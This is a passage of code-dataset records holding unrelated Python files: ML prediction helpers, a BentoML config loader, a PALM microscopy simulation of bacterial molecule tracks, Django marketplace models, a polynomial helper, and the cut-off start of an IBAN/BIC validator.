infoBN, markov_blanket]\n \n\n# GENERATE_LOCAL_PREDICTIONS -------------------------------------------\n#\ndef generate_local_predictions( X, Y, model, scaler, encoder ):\n \n # get original vector\n orig_vec = np.round(scaler.inverse_transform(X),6)\n\n # generate all predictions for X\n predictions = model.predict( X )\n\n # extrace the label of the prediction of X[indx]\n prediction_class = encoder.inverse_transform( predictions )\n local_data_dict = []\n for indx in range(0, orig_vec.shape[0]):\n\n ground_truth = np.expand_dims(Y[indx], axis=0)\n ground_truth_class = encoder.inverse_transform( ground_truth )[0][0]\n\n prediction = prediction_class[indx][0]\n\n # check if data point is a true positive\n if( ( int(prediction) == int(ground_truth_class) ) & (int(prediction)==1) & (int(ground_truth_class)==1) ):\n pred_type = \"TRUE POSITIVE\"\n\n # check if data point is a true negative\n if( ( int(prediction) == int(ground_truth_class) ) & (int(prediction)==0) & (int(ground_truth_class)==0) ):\n pred_type = \"TRUE NEGATIVE\"\n\n # check if data point is a false negative\n if( ( int(prediction) != int(ground_truth_class) ) & (int(prediction)==0) & (int(ground_truth_class)==1) ):\n pred_type = \"FALSE NEGATIVE\"\n\n # check if data point is a false positve\n if( ( int(prediction) != int(ground_truth_class) ) & (int(prediction)==1) & (int(ground_truth_class)==0) ):\n pred_type = \"FALSE POSITIVE\"\n\n local_data_dict.append( {'index' : indx,\n 'original_vector' : orig_vec[indx,:].tolist(),\n 'scaled_vector' : X[indx,:].tolist(),\n 'ground_truth' : ground_truth_class,\n 'predictions' : prediction,\n 'prediction_type' : pred_type})\n 
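# note: the four branches above assume binary labels encoded as 0/1;\n # with any other encoding, pred_type can be undefined (or stale from a\n # previous iteration) by the time it is appended\n 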
return local_data_dict\n \n##################################################################################\n# \t\t\t\t\tTEXT PROCESSING\t\t\t\t\t\t\t\t\t\t\t\t #\n# ###############################################################################\n\n\n# FIND -----------------------------------------------\n# \ndef find(s, ch):\n return [i for i, ltr in enumerate(s) if ltr == ch]\n\n# UNTOKENIZE -----------------------------------------------\n#\ndef untokenize( tokens, delim ):\n \n untokenized = tokens[0]\n \n for indx in range(1, len(tokens)):\n untokenized = untokenized + delim + tokens[indx]\n \n return untokenized\n\n# NORMALISE_LINE -------------------------------------------\n#\ndef normalise_line( my_str, class_label ):\n \n my_str = my_str.replace(\"\\\",\"+class_label, \"\")\n my_str = my_str.replace(\"-1e-05\", \"0.0000\")\n \n tokens = my_str.split(\"\\\",\\\"\")\n tokens_norm = []\n\n for token in tokens:\n\n token = token.replace(\"]\",\"\")\n\n indxs = find(token, \".\")\n indx_comma = find(token, \",\")[0]+2\n\n if( (len(token[indxs[1]+1 : -1 ]) >= 4) & (len( token[indxs[0]+1 : indx_comma-2 ]) >= 4) ):\n token_temp = token[0:indxs[0]] + \".\" + token[indxs[0] + 1 : indxs[0]+5] + \", \" +token[indx_comma:indxs[1]] + token[indxs[1] : indxs[1]+5 ] + \"]\"\n \n if( (len(token[indxs[1]+1 : -1 ]) < 4) & (len( token[indxs[0]+1 : indx_comma-2 ]) >= 4) ):\n extra = \"0\"*(np.abs(len(token[indxs[1]+1 : -1 ]) - 4))\n token_temp = token[0:indxs[0]] + \".\" + token[indxs[0] + 1 : indxs[0]+5] + \", \" +token[indx_comma:indxs[1]] + token[indxs[1] : -1 ] + extra + \"]\"\n \n if( (len(token[indxs[1]+1 : -1 ]) >= 4) & (len( token[indxs[0]+1 : indx_comma-2 ]) < 4) ):\n extra = \"0\"*(np.abs(len( token[indxs[0]+1 : indx_comma-2 ]) - 4))\n token_temp = token[0:indxs[0]] + \".\" + extra + \", \" +token[indx_comma:indxs[1]] + token[indxs[1] : -1 ] + extra + \"]\"\n \n if( (len(token[indxs[1]+1 : -1 ]) < 4) & (len( token[indxs[0]+1 : indx_comma-2 ]) < 4) ):\n extra2 = \"0\"*(np.abs(len(token[indxs[1]+1 : -1 ]) - 4))\n extra1 = \"0\"*(np.abs(len(token[indxs[0]+1 : -1 ]) - 4))\n token_temp = token[0:indxs[0]] + \".\" + extra1 + \", \" +token[indx_comma:indxs[1]] + token[indxs[1] : -1 ] + extra2 + \"]\"\n \n tokens_norm.append(token_temp)\n\n return untokenize( tokens_norm, \"\\\",\\\"\") + \"\\\",\" +class_label\n\n# NORMALISE_LINE -------------------------------------------\n#\ndef normalise_dataframe( path_to_permutations ):\n file = open(path_to_permutations,\"r\")\n\n f_write = open(path_to_permutations.replace(\".csv\", \"_norm.csv\"),\"w\")\n\n header = file.readline().replace(\"\\n\",\"\")\n f_write.write( header + \"\\n\")\n \n for line in file.readlines():\n \n # get class\n class_label = line.split(\"\\\",\")[-1].replace(\"\\n\",\"\")\n # normalise dataframe input\n line_norm = normalise_line( line.replace(\"\\n\",\"\"), class_label )\n # write normalised input to file\n f_write.write(line_norm + \"\\n\")\n \n file.close()\n f_write.close()\n \n\n\n \n\n\n","sub_path":"learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":35787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"568306587","text":"# Copyright 2019 Atalaya Tech, Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in 
writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport logging\nfrom datetime import datetime\n\nfrom ruamel.yaml import YAML\n\nfrom bentoml import __version__ as BENTOML_VERSION\nfrom bentoml.configuration import get_bentoml_deploy_version\nfrom bentoml.utils import Path\n\nBENTOML_CONFIG_YAML_TEPMLATE = \"\"\"\\\nversion: {bentoml_version}\nkind: {kind}\nmetadata:\n created_at: {created_at}\n\"\"\"\n\nLOG = logging.getLogger(__name__)\n\n\nclass BentoArchiveConfig(object):\n def __init__(self, kind=\"BentoService\"):\n self.kind = kind\n self._yaml = YAML()\n self._yaml.default_flow_style = False\n self.config = self._yaml.load(\n BENTOML_CONFIG_YAML_TEPMLATE.format(\n kind=self.kind,\n bentoml_version=get_bentoml_deploy_version(),\n created_at=str(datetime.utcnow()),\n )\n )\n\n def write_to_path(self, path, filename=\"bentoml.yml\"):\n return self._yaml.dump(self.config, Path(os.path.join(path, filename)))\n\n @classmethod\n def load(cls, filepath):\n conf = cls()\n with open(filepath, \"rb\") as config_file:\n yml_content = config_file.read()\n conf.config = conf._yaml.load(yml_content)\n\n if conf[\"version\"] != BENTOML_VERSION:\n msg = (\n \"BentoArchive version mismatch: loading archive bundled in version \"\n \"{}, but loading from version {}\".format(\n conf[\"version\"], BENTOML_VERSION\n )\n )\n\n # If major version is different, then there could be incompatible API\n # changes. Raise error in this case.\n if conf[\"version\"].split(\".\")[0] != BENTOML_VERSION.split(\".\")[0]:\n if not BENTOML_VERSION.startswith('0+untagged'):\n raise ValueError(msg)\n else:\n LOG.warning(msg)\n else: # Otherwise just show a warning.\n LOG.warning(msg)\n\n return conf\n\n def __getitem__(self, item):\n return self.config[item]\n\n def __setitem__(self, key, value):\n self.config[key] = value\n\n def __contains__(self, item):\n return item in self.config\n","sub_path":"bentoml/archive/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"194198173","text":"import cv2\nimport numpy as npy\nimport random as rnd\nfrom scipy import ndimage\nimport math as mt\nfrom skimage.external import tifffile\nfrom scipy.stats import expon\nimport pandas as pd\nimport scipy.io as sio\n#UNITs of time are in milliseconds\nfilename = 'Ecoli_Training_FAST_0.100_test.tif'\npixels = 500\nresolution = 10 #tens of nanometers\nsize_image = pixels*resolution # size of image in 10 nm resolution. 
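(worked example from the constants below: camera_exposure = 100 ms and dt = 5 ms\n#give int_steps = 20 simulation steps per exposure; with num_images = 80 and\n#interval_frame = 1, the track runs for track_steps = 20*80*1 = 1600 steps.) 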
Memory issues arise for better resolution\nimages = []\nimage = npy.zeros((size_image, size_image, 3), npy.uint16) # Create and RGB image\ninterval_frame = 1 # Time interval (frames)\ncamera_exposure = 100\ndt = 5#ms\nint_steps = npy.int_(camera_exposure/dt)\nnum_images = 80\n\ntrack_steps = int_steps*num_images*interval_frame\n#setting the number of time steps based on exposure, time interval, number of images\n\nprint(track_steps)\n\nintegrate_array = npy.arange(int_steps - 1,track_steps, int_steps*interval_frame)\nintegrate_array_2 = npy.arange(int_steps - 1,track_steps, int_steps*interval_frame)\nintegrate_array_2[0] = 0\nintegrate_array_2[1:] = integrate_array_2[1:] - int_steps + 1\nprint(integrate_array_2)\n#integrate_array = npy.arange(int_steps - 1,track_steps, int_steps*interval_frame)\nprint(integrate_array)\n#Array that tells when to snap an image\ntrack_numbers = 2\n#number of tracks per bacterium\nnum_bacteria = 350\n#number of bacteria\n\nint_fluorophore = 3000\n#Intensity within exposure time\nU1_single_spot = int_fluorophore/int_steps\n#Intensity per single time step\n\nout_background = 150\n#Camera noise\nout_back_sigma = 20\n#standard deviation of camera noise\nCell_bg_intensity = 5\n#Cell autofluorescence within exposure time. Note: it is not being integrated.\ncell_background = 0.2#Cell_bg_intensity/int_steps\n#print('cell background', cell_background, npy.random.poisson(cell_background, 1))\n#cell_background_sigma = 0.05\nmean_psf = 13\n#Point spread function. I.e how much the intensity of the spot will be spread out based on convultion with gaussian filter\nstd_psf = 1.0 #don't use\n\nwid_bac_mean = 70\n#mean width of bacterium\nstd_wid = 10\n\nlength_bac_mean = 300\n#mean length of bacterium\nstd_length = 50\n\nTbleach = 2000 # Bleach time (ms). Will need to vary this based on time interval\nkbleach = 1/Tbleach\nTunbind = 100000 #Bound time\nTbind = 100000 # Time to bind (i.e. 
search time)\nkunbind = 1/Tunbind\nkbind = 1/Tbind\nalpha_co = 0.4 # for chromosome bound fraction\n\nD1 = 5# Diffusion coefficient of fast moving population\nvar_1 = 2*D1*dt\n\nD2 = 0.05 # Diffusion coefficient of slow moving population in 10nm^2/mss\nvar_2 = 2*D2*dt**alpha_co\n\n#Weights of Diffusion coefficients\nw1 = 0.3\nw2 = 1-w1\nparams_array = [interval_frame, camera_exposure,cell_background, Tbleach,Tunbind,Tbind,D1,D2, int_fluorophore, w1]\nparams_array_num = npy.array(params_array)\ndat_df = pd.DataFrame(params_array_num)\ndat_df_Tr = dat_df.T\ncolumns_nam = ['Interval(frames)', 'Camera Exposure', 'Cell Background (per resolution)', 'Tbleach', 'Bound Time', 'Search Time', 'Fast Moving D', 'Bound D', 'IntFluorophore', 'Weight D1']\ndat_df_Tr.columns = columns_nam\n\n\n\n#df_params = pd.DataFrame(dat_df_Tr)#pd.DataFrame(dat_df_Tr, columns = columns_nam)\n\nfile_nam_params = filename.replace(\".tif\", \"_params.csv\")\ndat_df_Tr.to_csv(file_nam_params)\n#Array for positions of bacteria\nbac_cells = npy.zeros((num_bacteria, 6))\n\n#Borders of image\npositions_lower_bnd = 0\npositions_upper_bnd = 5000\n#Array for initial positions of tracks\ntrack_initials = npy.zeros((track_numbers, 3, num_bacteria))\n#Array for tracks\ntrack = npy.zeros((track_steps, 3, track_numbers, num_bacteria))\n#Array for state\ntrack_D = npy.zeros((track_numbers, 1, num_bacteria))\n\ntracks_save = npy.zeros((num_images,2, track_numbers,num_bacteria))\ntracks_save_D = npy.zeros((num_images,1, track_numbers,num_bacteria))\n#States for Diffusive State\nD1_st = 0\nD2_st = 1\n#States of fluorescence\nFL_st = 2\nBl_st = 3\n#Probabilities for diffusive state changes\nD1_F_p = expon.cdf(x=dt, scale=Tbind)\nD2_F_p = expon.cdf(x=dt, scale=Tunbind)\n#Bleach probability\nB_p = expon.cdf(x=dt, scale=Tbleach)\n#Probabilities for no transition\nD1_D1_p = 1 - D1_F_p\nD2_D2_p = 1 - D2_F_p\nB_p_N = 1 - B_p\n\n\nTrans_mat_D = npy.array([[D1_D1_p, D1_F_p], [D2_F_p, D2_D2_p]])\nTrans_mat_F = npy.array([B_p_N, B_p])\n\nweights = [w1, w2]\nD = [D1_st, D2_st]\n\nyrang_coord = npy.arange(positions_lower_bnd + (length_bac_mean + 3.5*std_length), positions_upper_bnd - (length_bac_mean + 3.5*std_length), (length_bac_mean + 3.5*std_length))\nxrang_coord = npy.arange(positions_lower_bnd + (wid_bac_mean + 3.5*std_wid), positions_upper_bnd - (wid_bac_mean + 3.5*std_wid), (wid_bac_mean + 3.5*std_wid))\n\n[xv, yv] = npy.meshgrid(xrang_coord, yrang_coord)\nnum_cols = npy.shape(xv)\nprint(num_cols)\ncoord_bac_x = []\ncoord_bac_y = []\nfor uu in range(num_cols[1]):\n for vv in range(num_cols[0] ):\n #x_coord_bac_sel = uu\n #y_coord_bac_sel = vv\n coord_bac_x.append(xv[0,uu])\n coord_bac_y.append(yv[vv,0])\n\ncoords_final = [coord_bac_x,coord_bac_y]\ncoords_final = [[row[i] for row in coords_final]\n for i in range(len(coords_final[0]))]\ncoords_final = npy.array(coords_final)\n#print(coords_final)\n\nfor u in range(num_bacteria):\n #Sampling for bacterial coordinates and dimensions\n x_coord_bac = coords_final[u,0]\n y_coord_bac = coords_final[u,1]\n wid_sam = int(rnd.normalvariate(wid_bac_mean, std_wid))\n length_sam = int(rnd.normalvariate(length_bac_mean, std_length))\n bac_cells[u, (0, 1)] = [x_coord_bac, y_coord_bac] # coordinate of center of bacterial cell\n bac_cells[u, 2] = x_coord_bac + wid_sam\n bac_cells[u, 3] = y_coord_bac + length_sam\n bac_cells[u, 4] = wid_sam\n bac_cells[u, 5] = length_sam\n r = bac_cells[u, 4] / 2 # radius of bacterial cell\n\n xmin = bac_cells[u, 0]\n xmax = bac_cells[u, 2]\n ymin = bac_cells[u, 0]\n ymax = 
bac_cells[u, 2]\n zmin = bac_cells[u, 1]\n zmax = bac_cells[u, 3]\n\n for w in range(track_numbers):\n x_init = rnd.randrange(xmin, xmax)\n x_origin = (xmax - xmin) / 2 + xmin\n y_init = rnd.randrange(ymin, ymax)\n y_origin = (ymax - ymin) / 2 + ymin\n z_init = rnd.randrange(zmin, zmax)\n #Initial localizations for tracks\n track_initials[w, :, u] = [x_init, y_init, z_init]\n #Restricting localizations to within bacterial cells\n while (track_initials[w, 2, u] < zmin) or (track_initials[w, 2, u] > zmax) or (\n (track_initials[w, 0, u] - x_origin) ** 2 +\n (track_initials[w, 1, u] - y_origin) ** 2 > r ** 2):\n x_init = rnd.randrange(xmin, xmax)\n y_init = rnd.randrange(ymin, ymax)\n z_init = rnd.randrange(zmin, zmax)\n track_initials[w, :, u] = [x_init, y_init, z_init]\n track[0, :, w, u] = track_initials[w, :, u]\n #Selecting initial diffusion state\n Diffusion_selection = npy.random.multinomial(1, weights)\n Diffusion_selection_elem = npy.nonzero(Diffusion_selection)\n Diffuse_state = npy.sum(Diffusion_selection_elem)\n track_D [w, 0, u] = Diffuse_state\n\n#Placing bacteria in image\nfor j in range(num_bacteria):\n bac_image = cv2.rectangle(image, (int(bac_cells[j, 0]), int(bac_cells[j, 1])), (int(bac_cells[j, 2]),\n int(bac_cells[j, 3])), (0, 255, 0), -1, 8)\n\nbac_image_final = cv2.cvtColor(bac_image, cv2.COLOR_BGR2GRAY)\n\nbac_image_16_reform = bac_image_final.reshape(pixels, resolution, pixels, resolution).sum(3).sum(1)\nbac_image_16 = npy.uint16(bac_image_16_reform)\nnon_zer_find = npy.nonzero(bac_image_16)\nbac_image_16[bac_image_16!=0] = 1\nfilename_bin = filename.replace(\".tif\", \"_binary.tif\")\n#filename_bin.replace(\".tif\", \"binary.tif\")\n#print(filename_bin)\ncv2.imwrite(filename_bin, bac_image_16)\n#Opening big tiff file\nwith tifffile.TiffWriter(filename, bigtiff=True) as tif:\n #Convert image to array\n bac_array = npy.array(bac_image_final)\n max_cell_value = npy.amax(bac_array)\n #Find pixels where bacteria cells are\n index_max = npy.argwhere(bac_array == max_cell_value)\n\n #Give cells autofluorescence\n for m in range(len(index_max)):\n bac_array[index_max[m, 0], index_max[m, 1]] = npy.random.poisson(cell_background, 1)\n bac_array_2 = npy.array(bac_array)\n\n for i in range(track_steps):\n if i in integrate_array_2:\n init_time = npy.where(integrate_array_2 == i)\n init_time = init_time[0]\n print(init_time)\n int_init = integrate_array_2[init_time].item()\n int_last = integrate_array[init_time].item()\n print(int_last)\n integrate_array_3 = npy.arange(int_init,int_last + 1)\n for u in range(num_bacteria):\n r = bac_cells[u, 4] / 2\n xmin = bac_cells[u, 0]\n xmax = bac_cells[u, 2]\n ymin = bac_cells[u, 0]\n ymax = bac_cells[u, 2]\n zmin = bac_cells[u, 1]\n zmax = bac_cells[u, 3]\n x_origin = (xmax - xmin) / 2 + xmin\n y_origin = (ymax - ymin) / 2 + ymin\n\n for w in range(track_numbers):\n #Setup initial positions of tracks\n if i == 0:\n spot_int = U1_single_spot\n spot_coord = npy.zeros((1, 2))\n spot_coord[0, (0, 1)] = [track[i, 0, w, u], track[i, 2, w, u]]\n spot_coord = npy.int_(spot_coord)\n gauss_sam = mean_psf#rnd.normalvariate(mean_psf, std_psf)\n init_spot = npy.zeros((70, 70))\n init_spot[34, 34] = spot_int\n\n gauss_filter = ndimage.gaussian_filter(init_spot, gauss_sam, truncate=8)\n for q in range(len(gauss_filter)):\n for v in range(len(gauss_filter)):\n poiss_dist = npy.random.poisson(gauss_filter[q, v], 1)\n gauss_filter[q, v] = poiss_dist\n spot_replace = bac_array_2[spot_coord[0, 1] - 34:spot_coord[0, 1] + 36,\n spot_coord[0, 0] - 
34:spot_coord[0, 0] + 36]\n if npy.size(spot_replace) != npy.size(gauss_filter):\n print(\"Work on your coding skills you idiot!\")\n spot_replace_2 = npy.add(spot_replace, gauss_filter)\n bac_array_2[spot_coord[0, 1] - 34:spot_coord[0, 1] + 36, spot_coord[0, 0] - 34:spot_coord[0, 0] + 36] = \\\n spot_replace_2\n continue\n #If molecule is bleached we don't care about it\n if track_D [w, 0, u] == Bl_st:\n continue\n\n #Determine if molecule bleaches within next time step\n Transition_BL = Trans_mat_F\n rand_multi_select_BL = npy.random.multinomial(1, Transition_BL)\n element_multi_BL = npy.nonzero(rand_multi_select_BL)\n state_select_BL = npy.sum(element_multi_BL)\n\n if state_select_BL + 2 == FL_st:\n #If it is fluorescence determine if molecule transitions to different diffusive state\n if track_D[w, 0, u] == D1_st:\n Transition_p = Trans_mat_D[D1_st, :]\n rand_multi_select = npy.random.multinomial(1, Transition_p)\n element_multi = npy.nonzero(rand_multi_select)\n state_select = npy.sum(element_multi)\n\n if state_select == D1_st:\n track_D[w, 0, u] = D1_st\n var = var_1\n\n elif state_select == D2_st:\n track_D[w, 0, u] = D2_st\n var = var_2\n\n elif track_D[w, 0, u] == D2_st:\n Transition_p = Trans_mat_D[D2_st, :]\n rand_multi_select = npy.random.multinomial(1, Transition_p)\n element_multi = npy.nonzero(rand_multi_select)\n state_select = npy.sum(element_multi)\n\n if state_select == D1_st:\n track_D[w, 0, u] = D1_st\n var = var_1\n\n elif state_select == D2_st:\n track_D[w, 0, u] = D2_st\n var = var_2\n #Pick a step size based on a normal distribution with variance determined by D value\n x_step = rnd.normalvariate(0, mt.sqrt(var))\n y_step = rnd.normalvariate(0, mt.sqrt(var))\n z_step = rnd.normalvariate(0, mt.sqrt(var))\n track[i, 0, w, u] = track[i - 1, 0, w, u] + x_step\n track[i, 1, w, u] = track[i - 1, 1, w, u] + y_step\n track[i, 2, w, u] = track[i - 1, 2, w, u] + z_step\n #Make sure molecules are still within bacterial cell. 
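(the cell volume is modelled as a cylinder: a radial test of (x, y) against r**2 plus a range test on z between zmin and zmax.) 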
Sample until it's within bounds\n while (track[i, 2, w, u] < zmin) or (track[i, 2, w, u] > zmax) or ((track[i, 0, w, u] - x_origin) ** 2 +\n\n (track[i, 1, w, u] - y_origin) ** 2 > r ** 2):\n x_step = rnd.normalvariate(0, mt.sqrt(var))\n y_step = rnd.normalvariate(0, mt.sqrt(var))\n z_step = rnd.normalvariate(0, mt.sqrt(var))\n track[i, 0, w, u] = track[i - 1, 0, w, u] + x_step\n track[i, 1, w, u] = track[i - 1, 1, w, u] + y_step\n track[i, 2, w, u] = track[i - 1, 2, w, u] + z_step\n #Spot intensity\n if i in integrate_array_3:\n spot_int = U1_single_spot\n\n spot_coord = npy.zeros((1, 2))\n spot_coord[0, (0, 1)] = [track[i, 0, w, u], track[i, 2, w, u]]\n spot_coord = npy.int_(spot_coord)\n #Sample a PSF value\n gauss_sam = mean_psf#rnd.normalvariate(mean_psf, std_psf)\n init_spot = npy.zeros((70, 70))\n #Put Integrated intensity into center of array\n init_spot[34, 34] = spot_int\n\n #Add gaussian filter to intensity to spread out intensity\n gauss_filter = ndimage.gaussian_filter(init_spot, gauss_sam, truncate=8)\n\n #For each coordinate, sample based on Poisson Shot noise\n for q in range(len(gauss_filter)):\n for v in range(len(gauss_filter)):\n poiss_dist = npy.random.poisson(gauss_filter[q, v], 1)\n gauss_filter[q, v] = poiss_dist\n spot_replace = bac_array_2[spot_coord[0, 1] - 34:spot_coord[0, 1] + 36,\n spot_coord[0, 0] - 34:spot_coord[0, 0] + 36]\n\n if npy.size(spot_replace) != npy.size(gauss_filter):\n print(\"Work on your coding skills you idiot!\")\n\n #Add spot intensity to intensities at original location\n spot_replace_2 = npy.add(spot_replace, gauss_filter)\n #Replace original coordinates with revised intensity at that region\n bac_array_2[spot_coord[0, 1] - 34:spot_coord[0, 1] + 36, spot_coord[0, 0] - 34:spot_coord[0, 0] + 36] = \\\n spot_replace_2\n #If bleach state is picked continue\n elif state_select_BL + 2 == Bl_st:\n track_D[w, 0, u] = Bl_st\n continue\n print (i, 'TimeStep')\n #Save image if it's integrate array. 
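(the reshape(pixels, resolution, pixels, resolution).sum(3).sum(1) below bins the\n #high-resolution array down to camera pixels: every resolution x resolution\n #block of 10 nm cells is summed into one pixel.) 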
Based on exposure time and time interval\n if i in integrate_array:\n print (i, \"save I\")\n #Convert to 16-bit array\n bac_array_int16 = npy.uint16(bac_array_2)\n #Reformat for pixels\n bac_array_reform = bac_array_int16.reshape(pixels, resolution, pixels, resolution).sum(3).sum(1)\n #Add EMCCD camera noise\n for m in range(len(bac_array_reform)):\n for n in range(len(bac_array_reform)):\n bac_array_reform[m, n] = bac_array_reform[m, n] + npy.random.normal(out_background, out_back_sigma, 1)\n\n tif.save(npy.uint16(bac_array_reform))\n\n\n bac_array = npy.array(bac_image_final)\n max_cell_value = npy.amax(bac_array)\n index_max = npy.argwhere(bac_array == max_cell_value)\n for m in range(len(index_max)):\n bac_array[index_max[m, 0], index_max[m, 1]] = npy.random.poisson(cell_background, 1)\n\n\n bac_array_2 = npy.array(bac_array)\n time_pt = npy.where(integrate_array == i)\n #print(time_pt)\n time_pt = time_pt[0]\n #print(time_pt)\n\n\n if time_pt == 0:\n time_step_prev = 0\n else:\n time_pt_prev = time_pt - 1\n time_step_prev = integrate_array[time_pt_prev].item()\n time_step_curr = integrate_array[time_pt].item()\n #print(integrate_array[time_pt_prev],integrate_array[time_pt])\n print(time_step_prev, time_step_curr)\n for u in range(num_bacteria):\n for w in range(track_numbers):\n\n x_mean_int = npy.mean(track[time_step_prev:time_step_curr, 0, w, u])\n y_mean_int = npy.mean(track[time_step_prev:time_step_curr, 2, w, u])\n tracks_save[time_pt, 0, w, u] = x_mean_int\n tracks_save[time_pt, 1, w, u] = y_mean_int\n tracks_save_D[time_pt, 0, w, u] = track_D[w, 0, u]\n # will use Matlab's nonzeros function remove zeros\n print('done')\nfile_nam_tracks = filename.replace(\".tif\", \"track_results.mat\")\nfile_nam_tracks_D = filename.replace(\".tif\", \"track_results_D.mat\")\nsio.savemat(file_nam_tracks,{'tracks_info' : tracks_save})\nsio.savemat(file_nam_tracks_D,{'tracks_info_D' : tracks_save_D})\n\n\n\n\n\n\n\n\n\n","sub_path":"Simulations/PALM Simulation_ECOLI_FINAL_Paper_Training.py","file_name":"PALM Simulation_ECOLI_FINAL_Paper_Training.py","file_ext":"py","file_size_in_byte":18239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"98585052","text":"from django.db import models\nfrom user.models import MyUser\nfrom django.utils.translation import gettext, gettext_lazy as _\n\n\nclass Subject(models.Model):\n subject = models.CharField(name='subject', max_length=30, null=False)\n\n\nclass SubSubject(models.Model):\n subject = models.ForeignKey(Subject, on_delete=models.CASCADE, null=False)\n sub_subject = models.CharField(name='sub_subject', max_length=30, null=False)\n\n class Meta:\n ordering = [\"subject\"]\n\n\nclass CommonQuestion(models.Model):\n common_question = models.CharField(name='common_question', max_length=100, default='-')\n\n class Meta:\n ordering = [\"pk\"]\n\nclass CommonQuestionValue(models.Model):\n common_question = models.ForeignKey(CommonQuestion, on_delete=models.CASCADE,)\n common_question_value = models.CharField(max_length=100, default='-')\n\n\nclass Question(models.Model):\n sub_subject = models.ForeignKey(SubSubject, on_delete=models.CASCADE)\n question = models.CharField(name='question', max_length=100, default='-')\n\n\nclass QuestionValue(models.Model):\n question = models.ForeignKey(Question, on_delete=models.CASCADE,)\n question_value = models.CharField(max_length=100, default='-')\n\n\nclass MasterUser(models.Model):\n\n STATUS_CHOICES = (\n (1, _(\"Selsect\")),\n (2, _(\"Man\")),\n (3, 
_(\"Woman\")),\n )\n\n ADDRESS_CHOICES = (\n (1, _(\"서울\")),\n (2, _(\"경기\")),\n (3, _(\"인천\")),\n (4, _(\"전남\")),\n (5, _(\"대전\")),\n (6, _(\"대구\")),\n (7, _(\"부산\")),\n )\n\n user = models.ForeignKey(MyUser, on_delete=models.CASCADE, null=False)\n gender = models.IntegerField(default=1, null=False, choices=STATUS_CHOICES)\n cellphone = models.CharField(default='010', max_length=20)\n address = models.IntegerField(default=1, null=False, choices=ADDRESS_CHOICES)\n brief_intro = models.CharField(name='brief_intro', max_length=50, default='')\n info = models.CharField(name='info', max_length=300, default='-')\n image = models.ImageField(blank=True, upload_to=\"soomgo/images/%Y/%m/%d\")\n number_employment = models.IntegerField(name='number_employment', default=0)\n\n\nclass MasterLesson(models.Model):\n master_user = models.ForeignKey(MasterUser, on_delete=models.CASCADE, null=False)\n lesson = models.ForeignKey(SubSubject, on_delete=models.CASCADE, null=False)\n\n\nclass Request(models.Model):\n user = models.ForeignKey(MyUser, on_delete=models.CASCADE, null=False)\n common_question_value_1 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_1')\n common_question_value_2 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_2')\n common_question_value_3 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_3')\n common_question_value_4 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_4')\n common_question_value_5 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_5')\n common_question_value_6 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_6')\n common_question_value_7 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_7')\n common_question_value_8 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_8')\n # question_value = models.ForeignKey(QuestionValue, on_delete=models.CASCADE)\n\n\nclass Message(models.Model):\n send_user = models.ForeignKey(MyUser, on_delete=models.CASCADE, related_name='send_user', null=False)\n receive_user = models.ForeignKey(MyUser, on_delete=models.CASCADE, related_name='receive_user', null=False)\n message = models.CharField(name='message', max_length=500)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n sort = models.CharField(name='chat_or_review', max_length=10)\n\n\nclass TransAction(models.Model):\n request_user = models.ForeignKey(MyUser, on_delete=models.DO_NOTHING,related_name='request_user', null=False)\n master_user = models.ForeignKey(MyUser, on_delete=models.DO_NOTHING, related_name='master_user', null=False)\n req = models.ForeignKey(Request, on_delete=models.DO_NOTHING)\n","sub_path":"soomgo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"645966042","text":"from auxiliary.utils import get_device\n\n# --- Random seed (for reproducibility) ---\n\nRANDOM_SEED = 0\n\n# --- Device (cpu or cuda:n) ---\n\nDEVICE_TYPE = \"cuda:0\"\nDEVICE = get_device(DEVICE_TYPE)\n\n# --- PATHS ---\n\nPATH_TO_DATASET = \"/media/matteo/Extreme 
SSD/dataset/ccc\"\nPATH_TO_PRETRAINED = \"trained_models\"\n","sub_path":"auxiliary/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"273425512","text":"import numpy as np\r\n\r\n# This function adds two polynomials defined by vectors x and y\r\ndef add(x,y):\r\n m = len(x)\r\n n = len(y)\r\n if m == n:\r\n z = np.add(x,y)\r\n elif m > n:\r\n z = np.add(x,np.concatenate([np.zeros(m-n),y]))\r\n else:\r\n z = np.add(np.concatenate([np.zeros(n-m),x]),y)\r\n return z\r\n\r\n","sub_path":"Assignment2/codes/iir/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"101272400","text":"import sys\nimport re\nfrom models import Length\n\nclass IbanBicValidation(object):\n\n def __init__(self, iban, bic):\n self.iban = iban\n self.bic = bic\n\n def convert_num(self, pos_integer):\n if pos_integer.isalpha():\n return str(ord(pos_integer.lower()) - ord('a') + 10)\n else:\n return 